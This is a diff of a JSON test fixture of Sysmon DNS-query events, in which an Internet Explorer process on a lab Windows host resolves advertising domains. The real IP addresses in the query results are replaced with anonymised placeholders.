"::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.544", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6963,7 +6963,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6975,7 +6975,7 @@ "ProcessId": "2736", "QueryName": "router.infolinks.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", @@ -7019,7 +7019,7 @@ "ProcessId": "2736", "QueryName": "grey.erne.co", "QueryStatus": "0", - "QueryResults": "::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.552", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -7035,7 +7035,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7052,7 +7052,7 @@ "ProcessId": "2736", "QueryName": "sync.jivox.com", "QueryStatus": "0", - "QueryResults": "::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, @@ -7080,7 +7080,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -7089,7 +7089,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7113,7 +7113,7 @@ "ProcessId": "2736", "QueryName": "b1sync.zemanta.com", "QueryStatus": "0", - "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5", + "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -7144,7 +7144,7 @@ "event_data": { "QueryName": "tg.socdm.com", "QueryStatus": "0", - "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.619", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7161,7 +7161,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -7173,7 +7173,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 